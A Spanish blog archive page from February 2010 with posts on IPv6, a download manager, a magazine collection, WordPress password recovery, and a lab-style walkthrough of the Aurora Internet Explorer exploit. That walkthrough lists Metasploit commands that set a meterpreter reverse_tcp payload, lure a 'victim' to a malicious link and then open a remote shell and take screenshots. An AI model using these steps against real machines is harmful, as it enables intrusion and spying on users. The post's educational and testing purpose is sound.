2010 febrero en Rincón Informático

IPv6 para todos

Posted by fortress On febrero - 6 - 2010

Navegando por el foro de la comunidad DragonJAR encuentro un post en el cual nos comparten un documento de lo más interesante, este nos habla de todo lo que necesitamos saber sobre IPv6 (Instalación, configuración, servicios, etc.) aqui les dejo la tabla de contenido.

Tabla de contenido

Introducción
Usuario Fina
Instalación de IPv6
Comprobación de IPv6
Configuración avanzada de IPv6
Mecanismos de transición con IPv6
Desinstalación de IPv6
Home Office (redes residenciales)
¿A qué se denomina“SOHO”?.
Construyendo un SOHO con IPv6
Identificando las partes de un SOHO
Determinando los componentes que requieren configuración
Configurando los componentes del SOHO con IPv6
Servicios .
Sobre servicios
TelnetSSH.
FTP
Mail
Transmisión Multimedia
Web
DNS
Clientes
Empresas
Introducción a redes empresariales
Tareas previas para una implementación de IPv6
Planificando IPv6 en redes empresariales
Transición a IPv6 en una red empresarial y agotamiento de IPv4
Entorno académico y de investigación
¿Por qué y para qué se utiliza IPv6 en educación e investigación?
Redes académicas en el mundo
Desplegando IPv6 en la universidad/centro de investigación
Consideraciones adicionales
Proveedor de Servicio de Internet (ISP)
A quién está dirigido el Capítulo
Componentes del servicio
Implementación de IPv6 en la red
Como recibir bloques IPv6 del registro regional
Plan de numeración

Bueno dejo el enlace al documento IPv6 para todos. Espero y les sea util.

1. Introducción ……………………………………………………………………………………. 13
2. Usuario Final …………………………………………………………………………………… 19
Introducción ……………………………………………………………………………………………………………. 21
Instalación de IPv6 ………………………………………………………………………………………………… 21
Comprobación de IPv6 ………………………………………………………………………………………….. 28
Configuración avanzada de IPv6 …………………………………………………………………………. 35
Mecanismos de transición con IPv6 …………………………………………………………………… 39
Desinstalación de IPv6 ………………………………………………………………………………………….. 41
3. Home Office (redes residenciales) …………………………………………………….. 43
Introducción ……………………………………………………………………………………………………………. 45
¿A qué se denomina “SOHO”?………………………………………………………………………………. 45
Construyendo un SOHO con IPv6 ……………………………………………………………………….. 45
7
Identificando las partes de un SOHO ………………………………………………………………….. 46
Determinando los componentes que requieren configuración …………………….. 47
Configurando los componentes del SOHO con IPv6 ……………………………………….. 48
Referencias………………………………………………………………………………………………………………. 48
4. Servicios …………………………………………………………………………………………. 59
Introducción ……………………………………………………………………………………………………………. 61
Sobre servicios ……………………………………………………………………………………………………….. 61
Telnet ……………………………………………………………………………………………………………………….. 61
SSH……………………………………………………………………………………………………………………………. 63
FTP ……………………………………………………………………………………………………………………………. 64
Mail ………………………………………………………………………………………………………………………….. 65
Transmisión Multimedia ……………………………………………………………………………………….. 67
Web ………………………………………………………………………………………………………………………….. 70
DNS ………………………………………………………………………………………………………………………….. 77
Clientes ……………………………………………………………………………………………………………………. 93
Referencias………………………………………………………………………………………………………………. 94
Introducción
5. Empresas ……………………………………………………………………………………….. 95
Introducción a redes empresariales ……………………………………………………………………. 97
Tareas previas para una implementación de IPv6 ……………………………………………. 98
Planificando IPv6 en redes empresariales …………………………………………………………100
Transición a IPv6 en una red empresarial y agotamiento de IPv4 …………………107
6. Entorno académico y de investigación ……………………………………………. 109
Introducción …………………………………………………………………………………………………………..111
¿Por qué y para qué se utiliza IPv6 en educación e investigación? ……………….111
Redes académicas en el mundo …………………………………………………………………………114
Desplegando IPv6 en la universidad/centro de investigación ……………………..119
Consideraciones adicionales ………………………………………………………………………………128
Conclusiones …………………………………………………………………………………………………………129
7. Proveedor de Servicio de Internet (ISP) ………………………………………….. 131
A quién está dirigido el Capítulo ………………………………………………………………………..133
Componentes del servicio ………………………………………………………………………………….135
Implementación de IPv6 en la red …………………………………………………………………….137
Como recibir bloques IPv6 del registro regional ……………………………………………..138
Plan de numeración ……………………………………………………………………………………………..139
Conclusiones …………………………………………………………………………………………………………149
8

Tweet

Etiquetas: comunidad, configuración, dragonjar, ftp, Instalación, ip, ip version 6, ipv6, servicios, ssh, Web

Redes

Tucan: Descargando desde Rapidshare y Megaupload en GNU/Linux

Posted by Epsilon On febrero - 5 - 2010

Siempre me han molestado las descargas de servidores como rapidshare o megaupload, debido a sus restricciones, tanto de tiempo, como de tamaño de los archivos, me daba cierto inconformismo tener que esperar cierto tiempo para descargar la siguiente parte del archivo, por esta razón generalmente busco archivos con un solo link para la descarga, pero lamentablemente por las mismas restricciones es imposible encontrar algunos archivos disponibles con un solo link. En windows existen herramientas que nos ayudan a eliminar estas restricciones, probe uno de tantos (llamado download direct) emulándolo con wine, todo iba bien y al parecer funcionaba perfecto, cumplía mis expectativas 100%, hasta el momento que fui a descomprimir las partes que había descargado, todas estaban malas!!.

Seguí con mi propósito de encontrar un gestor de descargas para GNU/Linux, que satisfaciera mis necesidades y me encontré con tucán, una aplicacion libre que si bien no quita todas las restricciones que ponen estos servidores, nos hace mas fáciles las descargas. según su pagina oficial, tucán es:

Tucán Manager es una aplicación para compartir archivos gratuitos diseñado para 1-Click Hosters. Rápido y ligero, Tucán es totalmente abierto y compatible con Windows, GNU / Linux y MacOSX.

Con el apoyo de los módulos de Tucán para el Hosters principal, tendrá increíbles características como:la resolución de captcha, enlaces intercambiables, cuentas de usuario premium, y muchas otras, usted aprenderá por qué los usuarios de en todo el mundo están haciendo el cambio a formato gratuito, 1-Click abierto el intercambio de archivos alojados.

La instalación es muy sencilla, los usuarios de Debian y derivados pueden hacer uso del gestor de paquetes:

apt-get install tucan

Para los usuarios de otras distribuciones, pueden descargar las fuentes desde acá, descomprimirlas y ejecutar:

make install

Ahora simplemente lo ejecutamos y lo primero que nos aparecerá es la ventana donde escogeremos los servidores en los cuales deseamos descargar, hay una amplia cantidad de ellos:

tucan, rapidshare, megaupload

Después de haber seleccionado los servidores, daremos click donde dice añadir descargas, en esta pantalla tendremos una caja de texto donde pegaremos todos los links de descarga, y comprobaremos que todos los links estén disponibles, para ello damos click en “comprobar enlaces”.

descargar archivos linux

Si no tenemos problema con los links, damos click en añadir. y esto es todo, solo queda esperar a que nuestra aplicacion empiece a trabajar, puedes irte o dormir mientras tucán descarga cada una de las partes que agregaste. Por ultimo aunque tiene algunos fallos, y no se ha implementado la opción de las subidas, tucán surgen como una buena alternativa a la hora de realizar las descargas de servidores como rapidshare o megaupload.

Tweet

Etiquetas: click, compartir archivos, debian, descarga, descargar, descargar rapidshare, download, download limit megaupload, GNU/Linux, herramienta, megaupload, rapidshare, servidor, Servidores, sin esperas, tucan, Virus

GNU/Linux, software libre

Coleccion: 51 numeros de la revista NEX IT

Posted by Epsilon On febrero - 4 - 2010

Navegando en el foro de la comunidad DragonJAR me encontre un post muy interesante, en el cual un usuario, muy amablemente nos comparte 51 numeros de la revista NEX IT. Esta revista esta catalogada como una de las mejores revistas del habla hispana, en ella se encontraran temas muy importantes y llamativos en el campo de la seguridad, las redes y los sistemas operativos. Segun su web, la revista va dirigida hacia:

empresas dedicadas a las tecnologías de la información y/o aquellas que apoyan sus negocios en la tecnología. También está orientado a personas con un particular interés en seguridad y administración de redes o programación, administradores de sistemas, encargados de seguridad informática, empresas de diseño y hosting de páginas web. Para aquellos estudiantes universitarios de las carreras de sistemas y para quienes estén buscando las Certificaciones Internacionales de Cisco (CCNA, CCNP), Microsoft (MCSA, MCSE, MCAD, MCSD, MCDBA), Linux (LPI, Linux+) les será también de gran utilidad.

He leido algunos numeros, y aunque los primeros incluyen temas un poco viejos (ya que son del 2002) hay conceptos que todavia se utilizan como IpSec o el mismo Active directory los cuales depronto muchos de nosotros no tenemos muy claros.

Me tome la tarea de subir todos los numeros en 3 paquetes grandes, espero que los descarguen y se animen a leer y aprender un poco mas.

Parte1 , parte 2 y parte 3

Tweet

Etiquetas: Active Directory, dragonjar, Entrevista, ezine, hacking, ipsec, nex it, Redes, revista, revista it, seguridad, Web

Referencias, Seguridad Informatica

Como recuperar o cambiar tu clave de WordPress

Posted by Epsilon On febrero - 3 - 2010

Si alguna vez te olvidas o te roban la contraseña de tu blog en wordpress y por alguna razon(quizas la persona que te la quito cambio el correo de tu usuario), la funcion de “olvido contraseña” no sirve… no te preocupes, puedes recuperarla de forma sencilla, siempre y cuando tengas acceso al servidor de bases de datos, (MYSQL). Antes de comenzar con el procedimiento hay que aclarar que este metodo solo sirve para aquellos blogs que usen WordPress como CMS y que esten alojados en hosting propio, es decir para aquellos blogs que se encuentran en wordpress.com, no les sirve el proceso que vamos a enunciar acontinuacion:

Entramos a nuestro servidor de bases de datos. ya sea por consola o usando algun cliente grafico como phpmyadmin.
Seleccionamos la base de datos de nuestro blog.
Nos dirigimos a la tabla wp_users
Buscamos la fila donde se encuentre el usuario al cual le cambiaremos la contraseña.
Editamos esta linea, borrando la cadena que haya en el campo user_pass.

wordpress password

Entramos a esta pagina y alli digitaremos la nueva contraseña, esperamos a que nos genere el nuevo hash. y lo asignamos en el campo user_pass.
Guardamos los cambios.

hash mysql

Y eso es todo, de esta forma al iniciar de nuevo sesion en wordpress digitaremos nuestro usuario y la nueva contraseña que asignamos. Si no hay problema alguno, estaremos de nuevo en nuestro dashboard

Tweet

Etiquetas: blog, clave, clave con, cms, contraseña, hash, hash wordpress, mysql, phpmyadmin, recuperar, servidor, usuario, usuario clave, WordPress

Seguridad Informatica, software libre

Ciberataque Aurora: Explotando vulnerabilidad 0-day en Internet Explorer (PoC)

Posted by Epsilon On febrero - 2 - 2010

Hace pocos días, Google y otras grandes empresas recibieron un ciberataque denominado “Aurora” el cual aprovechaba una nueva vulnerabilidad de tipo 0-day en Internet explorer que permite la ejecución remota de código en las maquinas vulnerables. Cito la noticia:

McAfee Labs ha estado trabajando contra reloj para evaluar cómo se realizó el ciberataque al que han bautizado como Aurora y que afectó tanto a Google como a varias decenas de empresas y a sus servidores de correo. Una de las causas de este ataque ha sido la aparición de una nueva vulnerabilidad Zero Day en Internet Explorer, que se descubrió recientemente gracias a esas tareas de investigación y sobre la que Microsoft ya ha publicado sus propias notas.

Según los estudios de McAfee, los intrusos ganaron accesos a las organizaciones mandando ataques a medida a ciertas personas que se supone que tienen permisos de acceso especiales. La combinación de mensajes que parecían provenir de fuentes de confianza y de la vulnerabilidad en IE puede haber sido la base de dichos ataques, según la firma de seguridad

Observando el impacto que tuvo dicha vulnerabilidad, acá en RinconInformatico.NET quisimos hacer una prueba de concepto (al igual como lo hicimos con una vulnerabilidad de Firefox) para comprobar lo fácil que es la explotacion de este fallo.

¿Que necesitamos?

Metasploit en su ultima versión ( o actualizarlo)
Una victima

Antes de empezar es oportuno aclarar que esta prueba fue hecha con un Windows XP SP2 e I6, según otras fuentes el exploit que se encuentra en el metasploit solo es efectivo con IE6, sin embargo, el exploit que pueden encontrar aqui sirve para todas las versiones de Internet explorer.

Y empezamos…

Después de tener nuestro metasploit framework abrimos la consola:

msfconsole

Ahora procedemos a seleccionar el exploit y darle los parámetros adecuados:

use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (nuestra ip)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

internet explorer exploit

Después de lanzar el exploit, debemos decirle a la víctima que acceda al siguiente enlace (LOCAL IP) en este caso es el siguiente:

http://192.168.1.4:8080/

Inmediatamente nuestra víctima abre el enlace malicioso veremos como el metasploit empieza a trabajar, hasta que nos abre una sesión. El siguiente paso es seleccionar la sesión:

sessions -i 1 // donde 1 es el id de la sesión que se ha creado.

Si todo ha salido bien tendremos el prompt de meterpreter, desde donde podemos hacer muchas cosas interesantes, como tomar un screenshot del escritorio de la víctima, saber el nombre del equipo con su grupo de trabajo, o en su defecto tener un shell remota de nuestro equipo víctima. algunos ejemplos:

meterpreter > use espia
meterpreter > screenshot victima1.bmp // el screenshot quedara en tu escritorio

meterpreter> shell // obtendremos una shell donde podemos hacer lo que deseemos.

Consideraciones..

Con este método, solo es vulnerable ie6
Un antivirus actualizado detecta el ataque (comprobado con nod32 y mcafee)
Obviamente si la víctima cierra el internet explorer se caera el ataque.

Por ultimo, no sobra decir que este es un laboratorio informativo, es decir, un prueba de concepto, el que haga esto no es un hacker. La idea de esta entrada no es ejecutar un exploit, es tratar de entender como es su funcionamiento y la forma de implementarlo.

Tweet

Etiquetas: antivirus, ataque, aurora, bug ie, exploit, exploit internet explorer, google, hacker, ie, Internet, internet explorer, laboratorio, metasploit, metasploit framework, Microsoft, nod32, remote exploit, seguridad, servidor, Servidores, shell, vulnerabilidad, xp

Seguridad Informatica, Windows

Coleccion de Wallpapers sobre Software libre

Posted by Epsilon On febrero - 1 - 2010

Mes nuevo y wallpaper nuevo, siempre es bueno cambiar periodicamente el fondo de pantalla de nuestra laptop o PC, esto le da un aire de renovacio y cambio. En esta ocasion queria compartir algunos wallpapers que he recolectado en mucho tiempo, son alrededor de 25 imagenes relacionadas con el software libre, GNU/Linux y mas especificamente, Debian, sin embargo tambien hay imagenes que a cualquier geek le podrian gustar, a continuacion dejare los preview de los wallpaperes y al final estara el enlace de de descarga, espero que les agrade, y se animen a compartir su coleccion personal de wallpapers.